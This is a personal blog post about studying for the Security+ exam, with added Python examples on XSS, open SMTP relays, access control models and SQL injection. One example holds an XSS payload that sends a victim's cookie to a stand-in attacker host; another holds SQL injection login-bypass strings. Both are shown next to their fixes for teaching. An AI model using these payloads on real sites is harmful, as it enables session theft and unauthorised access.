Security+… it’s similar to the last one, pt. 5

Back again with more… questions. Shocking, I know. Anyway, progress is going well. I’m finding that the portion of material I don’t know is about a quarter of it, so honestly that’s really good news as far as lead time to testing. How will the test go? Who knows. I seem to be hitting right on the money lately, and eventually if I keep doing that I’m going to fail. I hope I don’t, because these tests are expensive and I’m going to end up paying a gym a whole bunch of money to get out of a contract on something that they can provide yet offer as a service and refuse to let me out of the contract. Kind of bullshit, but you know, I’m just going to keep showing up and making fun of them and explain the situation to the outlandishly cocky people that work there as if I were completely in the wrong and state the facts, haha. Which makes it overwhelmingly obvious that they run a bad business or have no idea what they are doing. Regardless, they are stealing money from me.

[image: pretest question]

This is tough. I have no idea what some of this coding stuff is, so I take my best guess. Let’s get some definitions going.

  • Cross-site request forgery – an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated; the browser attaches the victim’s session cookie automatically, so the server cannot tell the forged request from a genuine one.
  • Buffer overflow – writing more data into a fixed-size buffer than it can hold, overwriting adjacent memory. Attackers use it to corrupt the execution stack of a program (a web application or anything else written in a memory-unsafe language) and, with carefully crafted input, make it execute arbitrary code, possibly taking over the machine. Buffer overflows have been found in a staggering array of products and components.
  • SQL injection – insertion or “injection” of SQL via the input data sent from the client to the application. A successful exploit can read sensitive data from the database, modify data (INSERT/UPDATE/DELETE), execute administrative operations on the database (such as shutting down the DBMS), recover the contents of a file on the DBMS file system and, in some cases, issue commands to the operating system.
  • JavaScript data insertion – cross-site scripting (XSS), a code injection attack that lets an attacker execute malicious JavaScript in another user’s browser. The tell in code is untrusted input being placed into HTML (or into a script block) without output encoding.
  • Firewall evasion script – possible with Nmap, whose scan options include packet fragmentation (-f), decoy source addresses (-D) and source-port spoofing (--source-port); an evasion script drives the scanner against the firewall or IDS rather than attacking the application’s code.

The thing is, some of this stuff I still don’t know what the code looks like, but I have a basic idea. I think I should be able to recognize SQL, but I’m unclear on the JAVA for sure, which happens to be the answer in this case. Am I going to have to completely learn JAVA, or is there some basic stuff I can do to get a quick idea about what XSS looks like? I’ll have to do some digging, but for now I’ll stick with the info on the OWASP site and see where it gets me.
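What the “JavaScript data insertion” (XSS) answer looks like in code, as an added example that is not part of the original post: a constructed search page that reflects the user’s query into its HTML, once raw and once HTML-encoded. The page template, the probe payload and the `attacker.example` host are all made up for illustration.

```python
import html

# Constructed page template: the search term is reflected straight into the markup.
TEMPLATE = "<h1>Results for: {query}</h1>"

# Constructed probe payload: a textbook reflected-XSS string. If it reaches the browser
# unencoded, the browser parses it as a script element and runs it in the victim's session.
PAYLOAD = '<script>location="http://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(query):
    """Reflect the untrusted value as-is. This is the bug: data becomes markup."""
    return TEMPLATE.format(query=query)


def render_hardened(query):
    """Same page, but the value is HTML-encoded for the context it lands in.
    quote=True also encodes ' and " so the fix still holds inside attribute values."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


def contains_script_element(markup):
    """Crude recogniser used below: does the output contain a live <script> tag?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # the payload survives intact: XSS
    print(render_hardened(PAYLOAD))     # &lt;script&gt;... : inert text on the page
```

The encoding has to match the context the value lands in (HTML body, attribute value, JavaScript string, URL); `html.escape` covers the first two. A Content-Security-Policy header is worth adding as defence in depth, but it does not replace output encoding.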

[image: pretest question]

The thing I don’t understand about this is, why would I dig the workstation I’m on? Why is the workstation a .com? I have so many questions. The workstation isn’t a domain.

[image: pretest question]

Honestly, I’m unclear on why a web application firewall would do this. There isn’t anything in this that clearly indicates what layer it’s functioning at, and the OWASP site isn’t clear either, but I guess I can remember that one. Honestly, with the Network+ there were not many questions from the pretest on the actual test, so when you see questions like this and the previous one, you’re kind of just screwed.

[image: pretest question]

Ok, so here’s the thing. Clearly SHA is the right answer, as seen here, but how do I learn about all the other types of certificates and what hashing algorithms they use? No clear answer to that, but I can promise you this exact question will not be on the test. Maybe the pretest will go over the rest of them.

[image: pretest question]

I’m not sure what an open relay is on an email server. An open relay is a Simple Mail Transfer Protocol (SMTP) server that is improperly configured to allow the unauthenticated relay of email. Oh, so that shit’s misconfigured and it just sends mail. Got it.
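The open-relay definition above, turned into the SMTP decision a mail server makes on RCPT TO, as an added example that is not part of the original post. The server name `mail.example.com`, the local domain, the trusted network and the probe addresses are all constructed; `open_relay=True` models the misconfiguration, `open_relay=False` the correct policy (accept mail for your own domains from anyone, relay to foreign domains only for authenticated or internal clients).

```python
# Constructed configuration for the example server "mail.example.com".
LOCAL_DOMAINS = {"example.com"}        # domains this server is the final destination for
TRUSTED_NETS = ("10.0.0.",)            # internal clients allowed to send outbound mail


def rcpt_decision(client_ip, authenticated, rcpt, open_relay=False):
    """Reply the server gives to RCPT TO. open_relay=True models the misconfiguration:
    the server forwards mail to any destination from any client, no questions asked."""
    domain = rcpt.rsplit("@", 1)[-1].lower()
    if domain in LOCAL_DOMAINS:
        return "250 2.1.5 OK"                     # inbound mail for our own domain
    if open_relay or authenticated or client_ip.startswith(TRUSTED_NETS):
        return "250 2.1.5 OK"                     # outbound relay for our own users
    return "554 5.7.1 Relay access denied"        # external -> external, unauthenticated


def open_relay_probe(client_ip, authenticated=False, open_relay=False):
    """The classic test: outside sender, outside recipient, no authentication.
    Returns (relay_accepted, transcript) where transcript is the client/server dialog."""
    transcript = [
        ("C", "EHLO probe.attacker.example"),
        ("S", "250 mail.example.com"),
        ("C", "MAIL FROM:<spammer@attacker.example>"),
        ("S", "250 2.1.0 OK"),
        ("C", "RCPT TO:<victim@elsewhere.example>"),
    ]
    reply = rcpt_decision(client_ip, authenticated, "victim@elsewhere.example", open_relay)
    transcript.append(("S", reply))
    return reply.startswith("250"), transcript


if __name__ == "__main__":
    for open_relay in (True, False):
        accepted, lines = open_relay_probe("203.0.113.9", open_relay=open_relay)
        print("OPEN RELAY" if accepted else "relay denied")
        for who, text in lines:
            print(f"{who}: {text}")
```

Against a real server, an authorized check is this same dialog typed into the mail port (for example with `openssl s_client -starttls smtp`); the only thing that matters is whether RCPT TO for a foreign domain gets a 250 before any authentication.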

[image: pretest question]

Why TLS is more important than a CRL is unclear to me. I’m going to look into that. Lol, I guess I should realize that one, as TLS is SSL’s replacement. Still, seems like a good idea to use a CRL as well. Just saying.

[image: pretest question]

I don’t know what 3 of these things are so I’m going to look them up.

  • MTBF – (mean time between failures) is a measure of how reliable a hardware product or component is.
  • ALE – Annualized loss expectancy. Used to measure risk with annualized rate of occurrence (ARO) and single loss expectancy (SLE). The ALE identifies the total amount of loss expected for a given risk. The calculation is SLE x ARO = ALE
  • ARO – annualized rate of occurrence: how many times per year the loss event is expected to happen (a fraction if it happens less than once a year)

Lol, so ARO is factored into ALE, but it’s not a complete answer.

[image: pretest question]

I’m very used to AD terms, and this is new terminology to get used to. These concepts seem to come up again and again, so I may have covered this before, but I’m going to go through it again.

  • Time-based – this one seems obvious in that it’s a time-of-day restriction on resources
  • Mandatory – mandatory access control refers to a type of access control by which the operating system constrains the ability of a subject or initiator to access, or generally perform some sort of operation on, an object or target; the labels are set by the system and the object’s owner cannot override them
  • Rule-based – rule-based access control (also abbreviated RBAC, which is easy to confuse with role-based): access is allowed or denied to resource objects based on a set of rules defined by a system administrator. I think this is what I’m used to. How could an OS with no administration perform this task?
  • Discretionary – in computer security, discretionary access control is a type of access control defined by the Trusted Computer System Evaluation Criteria “as a means of restricting access to objects based on the identity of subjects and/or groups to which they belong.” Isn’t this the same as role-based? They are technically both user based
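The four models in the list above side by side, as an added example that is not part of the original post, plus a role-based check for contrast since the list raises it. Each model is reduced to the one decision that makes it different: MAC compares system-assigned labels, DAC lets only the owner edit the ACL, rule-based walks an administrator’s rule list (a time window being one kind of rule, which is where time-based fits), and role-based hangs permissions off roles. The label lattice, ACLs, rules and roles are all constructed for illustration.

```python
from datetime import time

# ---- Mandatory (MAC): labels are assigned by the system; owners cannot change them.
LEVELS = {"public": 0, "confidential": 1, "secret": 2}   # constructed label lattice


def mac_can_read(clearance, label):
    """'No read up': a subject reads an object only at or below its own clearance."""
    return LEVELS[clearance] >= LEVELS[label]


# ---- Discretionary (DAC): the object's owner decides, by editing the ACL.
class DacObject:
    def __init__(self, owner):
        self.owner = owner
        self.acl = {owner: {"read", "write"}}

    def grant(self, granter, subject, perm):
        """Only the owner may hand out access; that discretion is what 'discretionary' means."""
        if granter != self.owner:
            raise PermissionError("only the owner may change the ACL")
        self.acl.setdefault(subject, set()).add(perm)

    def allows(self, subject, perm):
        return perm in self.acl.get(subject, set())


# ---- Rule-based: an administrator's ordered rule list, first match wins, default deny.
#      A time-of-day window is just one kind of rule; that is the "time-based" case.
def rule_based_allows(subject, obj, now, rules):
    for rule in rules:
        if rule["object"] not in ("*", obj) or rule["subject"] not in ("*", subject):
            continue
        start, end = rule.get("window", (time.min, time.max))
        if not start <= now <= end:
            continue
        return rule["action"] == "allow"
    return False


# Constructed rule set: payroll is reachable by anyone, but only during office hours.
RULES = [
    {"subject": "*", "object": "payroll", "window": (time(8, 0), time(18, 0)), "action": "allow"},
    {"subject": "*", "object": "*", "action": "deny"},
]


# ---- Role-based (the other RBAC), for contrast: permissions attach to roles, users get roles.
ROLE_PERMS = {"hr": {"read:payroll", "write:payroll"}, "engineer": {"read:repo"}}  # constructed


def role_based_allows(roles, perm):
    return any(perm in ROLE_PERMS.get(role, set()) for role in roles)


if __name__ == "__main__":
    print("MAC  secret->confidential:", mac_can_read("secret", "confidential"))
    doc = DacObject("alice")
    doc.grant("alice", "bob", "read")
    print("DAC  bob reads alice's doc:", doc.allows("bob", "read"))
    print("Rule payroll at 09:30:", rule_based_allows("anyone", "payroll", time(9, 30), RULES))
    print("Rule payroll at 22:00:", rule_based_allows("anyone", "payroll", time(22, 0), RULES))
    print("Role hr writes payroll:", role_based_allows({"hr"}, "write:payroll"))
```

The difference the exam cares about is who sets the policy: the system (MAC), the object owner (DAC), an administrator’s rules applied uniformly to everyone (rule-based, including time windows), or an administrator’s role assignments (role-based).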
[image: pretest question]

To be honest, I think I picked those since they are directly mentioned in the question. I do struggle with these questions; however, I’m kind of surprised by the MSCHAP answer. Ok, lol, according to this the answer is the obvious one, which seems correct.

[image: pretest question]

This one is pretty straightforward, and the answer could go either way, because trojans do bypass authentication to install rootkits, essentially, and then spread themselves. However, to be clear, I’m 100% certain on what a RAT is: a Remote Access Trojan (RAT) is a type of malware that allows hackers to monitor and control your computer or network. Lol, so… a backdoor.

[image: pretest question]

A Faraday cage or Faraday shield is an enclosure used to block electromagnetic fields. A Faraday shield may be formed by a continuous covering of conductive material or, in the case of a Faraday cage, by a mesh of such material.

[image: pretest question]

I don’t really know what these terms are.

  • MTBF – (mean time between failures) is a measure of how reliable a hardware product or component is. For most components, the measure is typically in thousands or even tens of thousands of hours between failures (we just did this one)
  • MTTR – mean time to repair: the average time to bring a failed component back into service
  • RTO – recovery time objective: the maximum acceptable time a system can be down after an incident
  • RPO – recovery point objective: the maximum acceptable amount of data loss, measured as the time since the last good backup

I feel like the wording in the question is a little confusing but I understand what they are getting at and agree with it.

[image: pretest question]

I had gone through about 100 questions this night and I have no idea why I picked that. Client side has nothing to do with executing a SQL injection; input validation is what comes into play.
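Why the defence has to be on the server, as an added example that is not part of the original post, using Python’s built-in sqlite3 against a constructed users table. `login_vulnerable` pastes the input into the SQL text, `login_hardened` uses a parameterised query, and `looks_like_identifier` is an assumed server-side validation rule added as defence in depth. Whatever JavaScript checks the page runs in the browser, the attacker sends the payload in the raw request and never sees them.

```python
import re
import sqlite3


def make_db():
    """Constructed sample database: two users with plaintext passwords (bad practice,
    kept that way so the injection is easy to read)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """The bug: untrusted input is spliced into the SQL text, so a quote or comment
    marker in the input changes the structure of the query."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """The fix: a parameterised query. The values travel separately from the SQL,
    so nothing in them can ever be parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Assumed server-side validation rule (defence in depth, not a substitute for parameters).
IDENTIFIER = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def looks_like_identifier(value):
    return IDENTIFIER.match(value) is not None


# Constructed payloads: what SQL injection looks like on the wire.
COMMENT_OUT = "alice' --"        # closes the string, comments out the password check
ALWAYS_TRUE = "' OR '1'='1"      # makes the WHERE clause true for every row


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, COMMENT_OUT, "wrong"))    # logs in as alice, no password
    print(login_vulnerable(db, "nobody", ALWAYS_TRUE))    # logs in as some real user
    print(login_hardened(db, COMMENT_OUT, "wrong"))       # None: the payload is just text
    print(looks_like_identifier(COMMENT_OUT))             # False: rejected before the query
```

The parameterised query is the actual fix; the identifier check only narrows what reaches the database and would not help for fields that legitimately contain quotes (a password, for instance), which is why it is layered on top rather than relied on alone.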

[image: pretest question]

The thing is, I don’t have any clue how data deduplication could have anything to do with this, and to be honest I doubt I’ll find a solid answer. Data deduplication should, in theory, be run and then be done, with the number of files reduced.

[image: pretest question]

Lol, SMTP is clearly wrong. FTPS I would have picked; SCP is what I’m confused on. Secure copy is a command-line utility that allows you to securely copy files and directories between two locations, and I’ve seen that before, lol.

All right, well, that’s all for now, and now to keep going with these pretest questions. 29% of the way through round 1, haha.


Blog at WordPress.com.